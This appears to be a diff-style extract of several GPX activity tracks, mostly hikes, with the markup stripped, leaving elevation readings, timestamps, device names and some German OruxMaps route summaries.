+2038.01
+2015-06-30T09:40:41Z
+
+
+2054.5
+2015-06-30T09:41:46Z
+
+
+2068.59
+2015-06-30T09:43:36Z
+
+
+2080.05
+2015-06-30T09:44:55Z
+
+
+2099.04
+2015-06-30T09:47:17Z
+
+
+2101.16
+2015-06-30T09:47:48Z
+
+
+2096.86
+2015-06-30T09:48:20Z
+
+
+2094.49
+2015-06-30T09:48:54Z
+
+
+2097.19
+2015-06-30T09:50:48Z
+
+
+2098.01
+2015-06-30T09:51:51Z
+
+
+2099.04
+2015-06-30T09:53:14Z
+
+
+2084.1
+2015-06-30T09:55:06Z
+
+
+2053.65
+2015-06-30T09:56:45Z
+
+
+2037.7
+2015-06-30T09:57:53Z
+
+
+1986.66
+2015-06-30T10:00:00Z
+
+
+1940.59
+2015-06-30T10:02:14Z
+
+
+1908.21
+2015-06-30T10:04:05Z
+
+
+1890.38
+2015-06-30T10:05:29Z
+
+
+1885.97
+2015-06-30T10:06:42Z
+
+
+1874.7
+2015-06-30T10:08:22Z
+
+
+1872.24
+2015-06-30T10:08:44Z
+
+
+1860.11
+2015-06-30T10:10:01Z
+
+
+1855.94
+2015-06-30T10:12:09Z
+
+
+1853.89
+2015-06-30T10:13:31Z
+
+
+1838.29
+2015-06-30T10:36:56Z
+
+
+1819.87
+2015-06-30T10:40:49Z
+
+
+1782.79
+2015-06-30T10:44:19Z
+
+
+1777.77
+2015-06-30T10:44:51Z
+
+
+1772.67
+2015-06-30T10:45:38Z
+
+
+1764.93
+2015-06-30T10:46:59Z
+
+
+1741.59
+2015-06-30T10:50:16Z
+
+
+1721.88
+2015-06-30T10:52:25Z
+
+
+1707.18
+2015-06-30T10:55:18Z
+
+
+1668.64
+2015-06-30T10:59:01Z
+
+
+1628.5
+2015-06-30T11:03:42Z
+
+
+1619.65
+2015-06-30T11:05:05Z
+
+
+1606.19
+2015-06-30T11:06:44Z
+
+
+1590.94
+2015-06-30T11:09:37Z
+
+
+1584.22
+2015-06-30T11:10:27Z
+
+
+1568.51
+2015-06-30T11:11:29Z
+
+
+1547.84
+2015-06-30T11:13:41Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-08-14T18:11:38Z
+
+
+2014-08-14 15:35:40
+
+
+
+
+
+
+2313.55
+2014-08-14T09:28:38Z
+
+
+2384.21
+2014-08-14T09:37:01Z
+
+
+2435.64
+2014-08-14T09:43:45Z
+
+
+2449.58
+2014-08-14T09:45:59Z
+
+
+2451.98
+2014-08-14T09:46:27Z
+
+
+2463.04
+2014-08-14T09:49:37Z
+
+
+2525.04
+2014-08-14T09:58:48Z
+
+
+2534.17
+2014-08-14T10:00:25Z
+
+
+2577.43
+2014-08-14T10:06:48Z
+
+
+2627.42
+2014-08-14T10:14:24Z
+
+
+2628.86
+2014-08-14T10:15:14Z
+
+
+2640.88
+2014-08-14T10:17:08Z
+
+
+2686.54
+2014-08-14T10:27:01Z
+
+
+2730.76
+2014-08-14T10:36:37Z
+
+
+2752.39
+2014-08-14T10:40:27Z
+
+
+2775.94
+2014-08-14T10:44:52Z
+
+
+2788.92
+2014-08-14T10:47:25Z
+
+
+2801.42
+2014-08-14T10:50:07Z
+
+
+2830.74
+2014-08-14T10:55:34Z
+
+
+2837.95
+2014-08-14T10:57:53Z
+
+
+2850.93
+2014-08-14T11:00:41Z
+
+
+2858.62
+2014-08-14T11:04:06Z
+
+
+2875.92
+2014-08-14T11:09:52Z
+
+
+2887.46
+2014-08-14T11:12:20Z
+
+
+2892.74
+2014-08-14T11:13:26Z
+
+
+2905.72
+2014-08-14T11:17:32Z
+
+
+2938.41
+2014-08-14T11:27:05Z
+
+
+2973.98
+2014-08-14T11:38:07Z
+
+
+3010.99
+2014-08-14T11:50:31Z
+
+
+2975.9
+2014-08-14T12:07:04Z
+
+
+2932.64
+2014-08-14T12:12:03Z
+
+
+2903.8
+2014-08-14T12:15:03Z
+
+
+2889.86
+2014-08-14T12:18:12Z
+
+
+2863.9
+2014-08-14T12:21:56Z
+
+
+2845.64
+2014-08-14T12:25:56Z
+
+
+2838.91
+2014-08-14T12:27:22Z
+
+
+2837.47
+2014-08-14T12:28:14Z
+
+
+2833.14
+2014-08-14T12:28:59Z
+
+
+2833.14
+2014-08-14T12:29:34Z
+
+
+2803.82
+2014-08-14T12:32:37Z
+
+
+2786.52
+2014-08-14T12:34:50Z
+
+
+2781.23
+2014-08-14T12:35:59Z
+
+
+2740.86
+2014-08-14T12:40:47Z
+
+
+2722.11
+2014-08-14T12:42:54Z
+
+
+2705.29
+2014-08-14T12:45:42Z
+
+
+2692.79
+2014-08-14T12:48:49Z
+
+
+2658.18
+2014-08-14T12:53:10Z
+
+
+2601.46
+2014-08-14T12:58:01Z
+
+
+2555.8
+2014-08-14T13:01:44Z
+
+
+2548.59
+2014-08-14T13:03:01Z
+
+
+2496.2
+2014-08-14T13:12:07Z
+
+
+2488.03
+2014-08-14T13:14:21Z
+
+
+2482.74
+2014-08-14T13:15:17Z
+
+
+2437.56
+2014-08-14T13:20:18Z
+
+
+2395.26
+2014-08-14T13:24:06Z
+
+
+2330.85
+2014-08-14T13:30:00Z
+
+
+2317.88
+2014-08-14T13:32:22Z
+
+
+2314.99
+2014-08-14T13:35:42Z
+ "
+"
+
+
+schibegütsch 2014-03
+
+
+
+
+
+
+schibegütsch 2014-03
+
+
+
+1317.0000079020374
+
+
+1322.3999708813362
+
+
+1333.1999421252224
+
+
+1340.2999316864898
+
+
+1356.1001373706088
+
+
+1394.6000346283342
+
+
+1400.7402090963517
+
+
+1405.1136657979207
+
+
+1407.1999559943145
+
+
+1403.5999280697654
+
+
+1386.899967892372
+
+
+1385.2999993038052
+
+
+1371.4999379922135
+
+
+1367.1000044529885
+
+
+1367.399998409914
+
+
+1365.1000001907805
+
+
+1373.4000428064664
+
+
+1377.9000588540864
+
+
+1392.1000912245966
+
+
+1461.5000589231813
+
+
+1481.4000553023536
+
+
+1505.4000138362755
+
+
+1507.8000514347145
+
+
+1516.6000295181225
+
+
+1533.3000654803266
+
+
+1578.3999499712777
+
+
+1585.4852625514743
+
+
+1593.599950365224
+
+
+1623.3000535636545
+
+
+1693.4999993418035
+
+
+1727.7999451336802
+
+
+1761.7
+
+
+1780.4
+
+
+1804.2001517080862
+
+
+1834.2001382306178
+
+
+1847.800321775573
+
+
+1881.5002156112241
+
+
+1932.7001835067156
+
+
+1966.0001244667933
+
+
+1997.6002476738693
+
+
+2022.4
+
+
+2002.4001780847566
+
+
+1960.9002034803814
+
+
+1937.7001827073345
+
+
+1891.2001818367296
+
+
+1846.2003037700385
+
+
+1815.1001441575768
+
+
+1760.6999979361585
+
+
+1727.799945133718
+
+
+1693.4999993872068
+
+
+1623.3000535636545
+
+
+1593.599950365224
+
+
+1585.1953527458984
+
+
+1578.3999499712777
+
+
+1533.300065480084
+
+
+1516.6000295181225
+
+
+1507.3999807809587
+
+
+1505.5
+
+
+1502.299983587986
+
+
+1482.899989091279
+
+
+1464.599959634165
+
+
+1447.3001084177058
+
+
+1391.9000879527061
+
+
+1379.6000634557968
+
+
+1371.1000554926359
+
+
+1365.0000006124992
+
+
+1366.8
+
+
+1367.2999982588633
+
+
+1366.8000089050886
+
+
+1365.6000075377926
+
+
+1372.899949178663
+
+
+1372.239552822343
+
+
+1363.400065947279
+
+
+1361.0000345790086
+
+
+1360.8000015677958
+
+
+1359.9728030862416
+
+
+1359.3999977457386
+
+
+1351.20003160952
+
+
+1333.1999421252224
+
+
+1322.3999708813362
+
+
+1317.0000079020374
+ "
+"
+
+
+
+
+
+
+Garmin International
+2018-04-07T22:12:05Z
+
+
+vaumuse
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: vaumuse</h2><br /><p>Startzeit: 04/05/2018 10:08</p><p>Zielzeit: 04/05/2018 12:08</p><p>Strecke: 5,6km (02:00)</p><p>Bewegungszeit: 01:26</p><p>Ø-Geschwindigkeit: 2,8km/h</p><p>Netto-Geschwindigkeit: 3,9km/h</p><p>Max. Geschwindigkeit: 7,3km/h</p><p>Minimale Höhe: 831m</p><p>Maximale Höhe: 1422m</p><p>Steig-Geschw.: 391,7m/h</p><p>Sink-Geschw.: -345,8m/h</p><p>Aufstieg: 625m</p><p>Abstieg: -79m</p><p>Steigzeit: 01:35</p><p>Sinkzeit: 00:13</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+
+
+
+
+
+850.8
+2018-04-05T08:08:28Z
+
+
+838.95
+2018-04-05T08:12:20Z
+
+
+854.68
+2018-04-05T08:13:15Z
+
+
+856.27
+2018-04-05T08:14:56Z
+
+
+860.62
+2018-04-05T08:15:40Z
+
+
+876.79
+2018-04-05T08:18:01Z
+
+
+915.73
+2018-04-05T08:23:29Z
+
+
+914.52
+2018-04-05T08:24:31Z
+
+
+920.37
+2018-04-05T08:25:38Z
+
+
+923.74
+2018-04-05T08:26:32Z
+
+
+933.69
+2018-04-05T08:28:58Z
+
+
+953.65
+2018-04-05T08:30:27Z
+
+
+958.14
+2018-04-05T08:30:58Z
+
+
+969.19
+2018-04-05T08:32:58Z
+
+
+973.12
+2018-04-05T08:34:12Z
+
+
+1006.08
+2018-04-05T08:39:09Z
+
+
+1049.87
+2018-04-05T08:46:12Z
+
+
+1058.25
+2018-04-05T08:49:11Z
+
+
+1077.15
+2018-04-05T08:52:07Z
+
+
+1103.99
+2018-04-05T08:55:47Z
+
+
+1121.25
+2018-04-05T08:59:09Z
+
+
+1146.31
+2018-04-05T09:01:30Z
+
+
+1166.41
+2018-04-05T09:05:38Z
+
+
+1164.72
+2018-04-05T09:10:29Z
+
+
+1176.93
+2018-04-05T09:14:05Z
+
+
+1203.36
+2018-04-05T09:17:04Z
+
+
+1210.37
+2018-04-05T09:18:27Z
+
+
+1213.24
+2018-04-05T09:19:21Z
+
+
+1250.28
+2018-04-05T09:31:35Z
+
+
+1278.25
+2018-04-05T09:35:24Z
+
+
+1295.09
+2018-04-05T09:38:09Z
+
+
+1306.1
+2018-04-05T09:40:15Z
+
+
+1329.21
+2018-04-05T09:42:09Z
+
+
+1336.3
+2018-04-05T09:42:42Z
+
+
+1342.88
+2018-04-05T09:44:57Z
+
+
+1337.61
+2018-04-05T09:51:07Z
+
+
+1366.24
+2018-04-05T09:55:55Z
+
+
+1399.2
+2018-04-05T10:00:30Z
+
+
+1400.74
+2018-04-05T10:01:31Z
+
+
+1395.26
+2018-04-05T10:04:12Z
+
+
+1422.27
+2018-04-05T10:08:48Z
+ "
+"
+
+
+
+
+
+
+
+Linie
+Erfassung über BayernAtlas
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+ "
+"
+
+
+
+
+
+
+Garmin International
+2015-05-12T14:59:49Z
+
+2015-05-12 16:59:48
+
+
+
+
+
+
+1025.35
+2015-05-12T10:50:47Z
+
+
+1025.7
+2015-05-12T10:52:11Z
+
+
+1032.93
+2015-05-12T10:53:20Z
+
+
+1067.16
+2015-05-12T10:55:42Z
+
+
+1099.72
+2015-05-12T10:58:05Z
+
+
+1117.98
+2015-05-12T10:59:47Z
+
+
+1142.17
+2015-05-12T11:01:31Z
+
+
+1164.5
+2015-05-12T11:03:09Z
+
+
+1184.84
+2015-05-12T11:04:53Z
+
+
+1189.09
+2015-05-12T11:05:53Z
+
+
+1194.59
+2015-05-12T11:06:59Z
+
+
+1210.86
+2015-05-12T11:08:19Z
+
+
+1232.12
+2015-05-12T11:09:47Z
+
+
+1250.59
+2015-05-12T11:11:11Z
+
+
+1267.0
+2015-05-12T11:12:33Z
+
+
+1291.5
+2015-05-12T11:14:23Z
+
+
+1321.33
+2015-05-12T11:16:27Z
+
+
+1342.46
+2015-05-12T11:24:28Z
+
+
+1360.95
+2015-05-12T11:26:04Z
+
+
+1409.14
+2015-05-12T11:29:20Z
+
+
+1482.24
+2015-05-12T11:35:09Z
+
+
+1503.09
+2015-05-12T11:38:30Z
+
+
+1531.03
+2015-05-12T11:41:50Z
+
+
+1564.77
+2015-05-12T11:44:10Z
+
+
+1588.49
+2015-05-12T11:45:51Z
+
+
+1609.05
+2015-05-12T11:47:33Z
+
+
+1641.1
+2015-05-12T11:49:39Z
+
+
+1683.09
+2015-05-12T12:03:21Z
+
+
+1718.26
+2015-05-12T12:13:37Z
+
+
+1765.6
+2015-05-12T12:20:58Z
+
+
+1837.34
+2015-05-12T12:26:10Z
+
+
+1722.42
+2015-05-12T13:25:29Z
+
+
+1721.97
+2015-05-12T13:27:20Z
+
+
+1680.98
+2015-05-12T13:31:50Z
+
+
+1655.46
+2015-05-12T13:38:51Z
+
+
+1640.27
+2015-05-12T13:40:37Z
+
+
+1604.9
+2015-05-12T13:42:23Z
+
+
+1590.33
+2015-05-12T13:43:40Z
+
+
+1525.41
+2015-05-12T13:46:49Z
+
+
+1491.68
+2015-05-12T13:50:53Z
+
+
+1536.36
+2015-05-12T14:03:02Z
+
+
+1493.71
+2015-05-12T14:22:59Z
+
+
+1483.51
+2015-05-12T14:25:03Z
+
+
+1415.99
+2015-05-12T14:29:13Z
+
+
+1393.72
+2015-05-12T14:30:25Z
+
+
+1336.82
+2015-05-12T14:39:01Z
+
+
+1318.87
+2015-05-12T14:40:53Z
+
+
+1277.85
+2015-05-12T14:42:57Z
+
+
+1259.96
+2015-05-12T14:44:12Z
+
+
+1237.39
+2015-05-12T14:45:22Z
+
+
+1215.11
+2015-05-12T14:46:37Z
+
+
+1198.6
+2015-05-12T14:47:36Z
+
+
+1195.59
+2015-05-12T14:48:30Z
+
+
+1152.3
+2015-05-12T14:51:40Z
+
+
+1121.04
+2015-05-12T14:53:26Z
+
+
+1037.12
+2015-05-12T14:58:12Z
+
+
+1034.37
+2015-05-12T14:59:17Z
+
+
+1034.99
+2015-05-12T14:59:45Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-08-26T12:26:15Z
+
+
+2014-08-14 14:01:22
+
+
+
+
+
+
+89.06
+2014-08-14T09:19:30Z
+
+
+88.1
+2014-08-14T09:25:55Z
+
+
+98.67
+2014-08-14T09:27:19Z
+
+
+129.43
+2014-08-14T09:31:33Z
+
+
+157.31
+2014-08-14T09:35:17Z
+
+
+167.41
+2014-08-14T09:37:05Z
+
+
+194.32
+2014-08-14T09:40:26Z
+
+
+205.86
+2014-08-14T09:41:42Z
+
+
+232.78
+2014-08-14T09:45:28Z
+
+
+236.62
+2014-08-14T09:46:25Z
+
+
+258.73
+2014-08-14T09:49:15Z
+
+
+269.79
+2014-08-14T09:50:37Z
+
+
+291.42
+2014-08-14T09:53:07Z
+
+
+304.88
+2014-08-14T09:54:54Z
+
+
+326.5
+2014-08-14T09:58:02Z
+
+
+333.23
+2014-08-14T09:59:32Z
+
+
+344.77
+2014-08-14T10:01:36Z
+
+
+362.07
+2014-08-14T10:04:05Z
+
+
+370.24
+2014-08-14T10:05:08Z
+
+
+385.63
+2014-08-14T10:07:32Z
+
+
+404.85
+2014-08-14T10:10:00Z
+
+
+427.92
+2014-08-14T10:14:11Z
+
+
+463.97
+2014-08-14T10:22:19Z
+
+
+494.26
+2014-08-14T10:26:10Z
+
+
+515.88
+2014-08-14T10:29:58Z
+
+
+532.71
+2014-08-14T10:32:27Z
+
+
+552.41
+2014-08-14T10:35:46Z
+
+
+550.97
+2014-08-14T10:36:53Z
+
+
+550.01
+2014-08-14T10:45:29Z
+
+
+554.34
+2014-08-14T10:47:30Z
+
+
+561.07
+2014-08-14T10:49:09Z
+
+
+562.99
+2014-08-14T10:55:52Z
+
+
+561.07
+2014-08-14T11:02:48Z
+
+
+548.09
+2014-08-14T11:08:56Z
+
+
+551.45
+2014-08-14T11:10:20Z
+
+
+526.46
+2014-08-14T11:15:15Z
+
+
+506.75
+2014-08-14T11:18:05Z
+
+
+492.81
+2014-08-14T11:20:45Z
+
+
+475.99
+2014-08-14T11:25:52Z
+
+
+471.18
+2014-08-14T11:26:52Z
+
+
+447.63
+2014-08-14T11:30:58Z
+
+
+428.4
+2014-08-14T11:34:23Z
+
+
+414.95
+2014-08-14T11:40:12Z
+
+
+410.14
+2014-08-14T12:10:14Z
+
+
+384.66
+2014-08-14T12:12:39Z
+
+
+371.69
+2014-08-14T12:14:02Z
+
+
+345.73
+2014-08-14T12:19:36Z
+
+
+317.37
+2014-08-14T12:23:12Z
+
+
+305.84
+2014-08-14T12:24:14Z
+
+
+291.9
+2014-08-14T12:25:36Z
+
+
+260.65
+2014-08-14T12:32:06Z
+
+
+223.64
+2014-08-14T12:36:08Z
+
+
+202.49
+2014-08-14T12:38:42Z
+
+
+187.59
+2014-08-14T12:41:32Z
+
+
+160.68
+2014-08-14T12:46:53Z
+
+
+149.14
+2014-08-14T12:48:15Z
+
+
+145.3
+2014-08-14T12:48:55Z
+
+
+140.97
+2014-08-14T12:50:42Z
+
+
+139.53
+2014-08-14T12:51:20Z
+
+
+89.54
+2014-08-14T12:56:12Z
+
+
+83.77
+2014-08-14T12:59:53Z
+
+
+83.77
+2014-08-14T13:01:08Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2016-09-03T07:12:54Z
+
+
+Tarrekaisestugan bis Fußgängerbrücke 001
+
+
+
+
+
+
+522.49609375
+
+
+518.359375
+
+
+532.59765625
+
+
+529.7890625
+
+
+513.7421875
+
+
+513.70703125
+
+
+523.26953125
+
+
+516.10546875
+
+
+516.66015625
+
+
+531.12890625
+
+
+532.15625
+
+
+549.64453125
+
+
+542.28515625
+
+
+514.36328125
+
+
+512.515625
+
+
+503.0859375
+
+
+497.203125
+
+
+500.7421875
+
+
+499.30078125
+
+
+497.765625
+
+
+498.06640625
+
+
+509.95703125
+
+
+553.96484375
+
+
+560.21484375
+
+
+562.55078125
+
+
+554.45703125
+
+
+528.08984375
+
+
+507.65234375
+
+
+485.9765625
+
+
+473.8359375
+
+
+447.921875
+
+
+434.0390625
+
+
+443.9765625
+
+
+445.99609375
+
+
+433.2109375
+
+
+424.640625
+
+
+422.9140625
+
+
+420.06640625
+
+
+421.14453125
+
+
+421.0859375
+
+
+417.37890625
+
+
+422.046875
+
+
+418.34765625
+
+
+417.78125
+
+
+411.578125
+
+
+400.9296875
+
+
+399.34375
+
+
+391.47265625
+
+
+389.54296875
+
+
+387.41015625
+
+
+387.73046875
+
+
+387.98046875
+
+
+385.640625
+
+
+384.625
+
+
+379.38671875
+
+
+385.37109375
+
+
+375.41015625
+
+
+372.30859375
+
+
+361.0546875
+
+
+360.734375
+
+
+359.625
+
+
+359.359375
+
+
+357.703125
+
+
+352.34375
+
+
+346.7578125
+
+
+340.8359375
+
+
+339.7265625
+
+
+331.29296875
+
+
+325.37890625
+
+
+319.60546875
+
+
+317.94140625
+
+
+317.546875
+
+
+318.0234375
+
+
+321.6875
+
+
+325.05078125
+
+
+322.2421875
+
+
+319.921875
+
+
+317.34375
+
+
+315.9140625
+
+
+314.11328125
+
+
+313.12109375
+
+
+311.125
+
+
+309.32421875
+
+
+307.8515625
+
+
+307.5390625
+
+
+307.06640625
+
+
+307.0
+ "
+"
+
+
+
+
+
+
+2015-06-24T17:32:36Z
+
+
+809849208 on GPSies.com
+809849208 on GPSies.com
+
+
+
+1148.0
+2015-06-20T13:09:01Z
+
+
+1148.0
+2015-06-20T13:10:21Z
+
+
+1171.0
+2015-06-20T13:13:13Z
+
+
+1171.0
+2015-06-20T13:13:50Z
+
+
+1171.0
+2015-06-20T13:17:39Z
+
+
+1171.0
+2015-06-20T13:20:41Z
+
+
+1170.0
+2015-06-20T13:22:47Z
+
+
+1171.0
+2015-06-20T13:30:01Z
+
+
+1166.0
+2015-06-20T13:42:27Z
+
+
+1148.0
+2015-06-20T13:44:37Z
+
+
+1147.0
+2015-06-20T13:47:51Z
+
+
+1143.0
+2015-06-20T13:49:28Z
+
+
+1123.0
+2015-06-20T13:53:52Z
+
+
+1100.0
+2015-06-20T13:57:47Z
+
+
+1077.0
+2015-06-20T14:02:57Z
+
+
+1077.0
+2015-06-20T14:03:47Z
+
+
+1085.0
+2015-06-20T14:10:21Z
+
+
+1086.0
+2015-06-20T14:26:49Z
+
+
+1090.0
+2015-06-20T14:27:56Z
+
+
+1098.0
+2015-06-20T14:30:39Z
+
+
+1100.0
+2015-06-20T14:33:20Z
+
+
+1100.0
+2015-06-20T14:35:04Z
+
+
+1100.0
+2015-06-20T14:35:21Z
+
+
+1100.0
+2015-06-20T14:36:32Z
+
+
+1100.0
+2015-06-20T14:38:57Z
+
+
+1100.0
+2015-06-20T14:45:16Z
+
+
+1122.0
+2015-06-20T15:08:50Z
+
+
+1122.0
+2015-06-20T15:18:09Z
+
+
+1140.0
+2015-06-20T15:51:06Z
+
+
+1141.0
+2015-06-20T15:55:35Z
+
+
+1140.0
+2015-06-20T15:56:49Z
+
+
+1140.0
+2015-06-20T15:57:13Z
+
+
+1145.0
+2015-06-20T16:01:27Z
+
+
+1149.0
+2015-06-20T16:06:58Z
+
+
+1155.0
+2015-06-20T16:09:01Z
+
+
+1159.0
+2015-06-20T16:11:08Z
+
+
+1158.0
+2015-06-20T16:13:27Z
+
+
+1179.0
+2015-06-20T16:50:11Z
+
+
+1179.0
+2015-06-20T16:53:51Z
+
+
+1217.0
+2015-06-20T17:39:50Z
+
+
+1208.0
+2015-06-20T17:42:09Z
+
+
+1198.0
+2015-06-20T17:42:56Z
+
+
+1190.0
+2015-06-20T17:43:36Z
+
+
+1183.0
+2015-06-20T17:44:11Z
+
+
+1151.0
+2015-06-20T17:46:43Z
+
+
+1151.0
+2015-06-20T17:48:30Z
+
+
+1154.0
+2015-06-20T17:51:46Z
+ "
+"
+
+
+Rotbachlspitze
+
+
+
+
+
+OruxMaps
+2015-09-10T05:53:21Z
+
+
+Rotbachlspitze
+<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Rotbachlspitze</h2><br /><p>Startzeit: 09/10/2015 07:53</p><p>Zielzeit: 09/10/2015 11:08</p><p>Strecke: 4,6km (03:15)</p><p>Bewegungszeit: 01:39</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,8km/h</p><p>Max. Geschwindigkeit: 5,3km/h</p><p>Minimale Höhe: 1772m</p><p>Maximale Höhe: 2893m</p><p>Steig-Geschw.: 353,5m/h</p><p>Sink-Geschw.: -151,9m/h</p><p>Aufstieg: 1096m</p><p>Abstieg: -9m</p><p>Steigzeit: 03:06</p><p>Sinkzeit: 00:03</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/>
+
+Unbestimmt
+
+
+
+
+
+1772.24
+2015-09-10T05:53:21Z
+
+
+1773.31
+2015-09-10T05:53:31Z
+
+
+1805.26
+2015-09-10T06:04:53Z
+
+
+1790.99
+2015-09-10T06:14:14Z
+
+
+1829.36
+2015-09-10T06:19:36Z
+
+
+1853.75
+2015-09-10T06:21:54Z
+
+
+1859.41
+2015-09-10T06:24:15Z
+
+
+1876.74
+2015-09-10T06:26:11Z
+
+
+1891.77
+2015-09-10T06:27:12Z
+
+
+1936.24
+2015-09-10T06:31:38Z
+
+
+1951.09
+2015-09-10T06:32:42Z
+
+
+1969.04
+2015-09-10T06:34:05Z
+
+
+1968.34
+2015-09-10T06:34:47Z
+
+
+1984.21
+2015-09-10T06:36:36Z
+
+
+2000.12
+2015-09-10T06:38:18Z
+
+
+2029.24
+2015-09-10T06:42:09Z
+
+
+2052.24
+2015-09-10T06:44:45Z
+
+
+2057.03
+2015-09-10T06:46:15Z
+
+
+2089.22
+2015-09-10T06:49:30Z
+
+
+2119.12
+2015-09-10T06:55:43Z
+
+
+2147.59
+2015-09-10T06:58:29Z
+
+
+2166.37
+2015-09-10T07:00:44Z
+
+
+2186.24
+2015-09-10T07:03:15Z
+
+
+2194.97
+2015-09-10T07:04:29Z
+
+
+2208.67
+2015-09-10T07:06:10Z
+
+
+2214.24
+2015-09-10T07:07:07Z
+
+
+2225.71
+2015-09-10T07:09:37Z
+
+
+2245.12
+2015-09-10T07:11:10Z
+
+
+2244.68
+2015-09-10T07:11:26Z
+
+
+2256.25
+2015-09-10T07:15:15Z
+
+
+2264.74
+2015-09-10T07:19:00Z
+
+
+2275.86
+2015-09-10T07:21:50Z
+
+
+2290.12
+2015-09-10T07:23:29Z
+
+
+2313.24
+2015-09-10T07:28:14Z
+
+
+2345.24
+2015-09-10T07:31:57Z
+
+
+2346.75
+2015-09-10T07:32:38Z
+
+
+2352.21
+2015-09-10T07:33:21Z
+
+
+2376.24
+2015-09-10T07:42:39Z
+
+
+2371.75
+2015-09-10T07:43:32Z
+
+
+2377.21
+2015-09-10T07:44:49Z
+
+
+2383.24
+2015-09-10T07:56:27Z
+
+
+2395.75
+2015-09-10T07:58:19Z
+
+
+2429.25
+2015-09-10T08:02:18Z
+
+
+2451.72
+2015-09-10T08:05:17Z
+
+
+2463.41
+2015-09-10T08:06:44Z
+
+
+2467.37
+2015-09-10T08:08:35Z
+
+
+2484.59
+2015-09-10T08:10:14Z
+
+
+2489.74
+2015-09-10T08:11:36Z
+
+
+2488.74
+2015-09-10T08:12:11Z
+
+
+2511.61
+2015-09-10T08:13:56Z
+
+
+2518.11
+2015-09-10T08:14:41Z
+
+
+2532.83
+2015-09-10T08:16:47Z
+
+
+2546.78
+2015-09-10T08:18:14Z
+
+
+2567.98
+2015-09-10T08:20:05Z
+
+
+2576.24
+2015-09-10T08:20:48Z
+
+
+2587.25
+2015-09-10T08:23:28Z
+
+
+2587.78
+2015-09-10T08:25:37Z
+
+
+2587.6
+2015-09-10T08:26:26Z
+
+
+2664.74
+2015-09-10T08:37:54Z
+
+
+2713.73
+2015-09-10T08:43:53Z
+
+
+2787.68
+2015-09-10T08:53:33Z
+
+
+2874.23
+2015-09-10T09:05:58Z
+
+
+2891.24
+2015-09-10T09:07:45Z
+
+
+2893.37
+2015-09-10T09:08:36Z
+ "
+"
+
+
+
+
+
+
+Garmin International
+2014-05-25T15:18:46Z
+
+
+2014-05-18 10:15:57 Auto
+
+
+
+
+
+
+1128.24
+2014-05-18T09:42:26Z
+
+
+1091.71
+2014-05-18T09:47:11Z
+
+
+1080.66
+2014-05-18T09:48:38Z
+
+
+1056.63
+2014-05-18T09:51:48Z
+
+
+1043.17
+2014-05-18T09:53:08Z
+
+
+1042.69
+2014-05-18T09:54:51Z
+
+
+1034.04
+2014-05-18T09:55:59Z
+
+
+1027.79
+2014-05-18T09:56:23Z
+
+
+1021.54
+2014-05-18T09:57:16Z
+
+
+1010.96
+2014-05-18T09:58:20Z
+
+
+994.62
+2014-05-18T09:59:30Z
+
+
+996.06
+2014-05-18T10:00:43Z
+
+
+996.06
+2014-05-18T10:01:23Z
+
+
+994.14
+2014-05-18T10:02:54Z
+
+
+995.1
+2014-05-18T10:03:51Z
+
+
+995.1
+2014-05-18T10:04:25Z
+
+
+994.14
+2014-05-18T10:05:39Z
+
+
+997.51
+2014-05-18T10:08:16Z
+
+
+1000.87
+2014-05-18T10:09:13Z
+
+
+1002.79
+2014-05-18T10:10:40Z
+
+
+1004.23
+2014-05-18T10:10:56Z
+
+
+1006.16
+2014-05-18T10:11:47Z
+
+
+1003.27
+2014-05-18T10:12:57Z
+
+
+1001.35
+2014-05-18T10:13:15Z
+
+
+992.22
+2014-05-18T10:14:08Z
+
+
+996.06
+2014-05-18T10:14:51Z
+
+
+991.26
+2014-05-18T10:15:35Z
+
+
+991.26
+2014-05-18T10:23:20Z
+
+
+991.26
+2014-05-18T10:24:52Z
+
+
+991.26
+2014-05-18T10:26:22Z
+
+
+989.33
+2014-05-18T10:29:05Z
+
+
+991.74
+2014-05-18T10:29:48Z
+
+
+990.3
+2014-05-18T10:33:50Z
+
+
+994.62
+2014-05-18T10:35:15Z
+
+
+995.58
+2014-05-18T10:41:30Z
+
+
+996.06
+2014-05-18T10:44:52Z
+
+
+993.66
+2014-05-18T10:45:55Z
+
+
+988.85
+2014-05-18T10:46:46Z
+
+
+990.3
+2014-05-18T10:47:49Z
+
+
+991.74
+2014-05-18T10:49:28Z
+
+
+993.18
+2014-05-18T10:50:06Z
+
+
+996.06
+2014-05-18T10:50:35Z
+
+
+998.95
+2014-05-18T10:51:16Z
+
+
+998.95
+2014-05-18T10:52:55Z
+
+
+1001.35
+2014-05-18T10:54:57Z
+
+
+1005.68
+2014-05-18T10:55:50Z
+
+
+1012.41
+2014-05-18T10:57:03Z
+
+
+1021.54
+2014-05-18T10:59:09Z
+
+
+1027.31
+2014-05-18T11:02:04Z
+
+
+1027.79
+2014-05-18T11:04:04Z
+
+
+1046.53
+2014-05-18T11:06:13Z
+
+
+1055.18
+2014-05-18T11:08:42Z
+
+
+1052.78
+2014-05-18T11:17:46Z
+ "
+"
+
+
+
+
+
+
+Garmin Connect
+2018-04-21T13:01:49Z
+
+Vertical Sass de Fer
+
+running
+
+
+204.0
+2018-04-21T13:01:49Z
+
+
+
+
+
+204.1999969482422
+2018-04-21T13:02:06Z
+
+
+
+
+
+212.0
+2018-04-21T13:02:24Z
+
+
+
+
+
+218.39999389648438
+2018-04-21T13:02:38Z
+
+
+
+
+
+224.0
+2018-04-21T13:03:01Z
+
+
+
+
+
+226.8000030517578
+2018-04-21T13:03:18Z
+
+
+
+
+
+223.60000610351562
+2018-04-21T13:03:37Z
+
+
+
+
+
+238.1999969482422
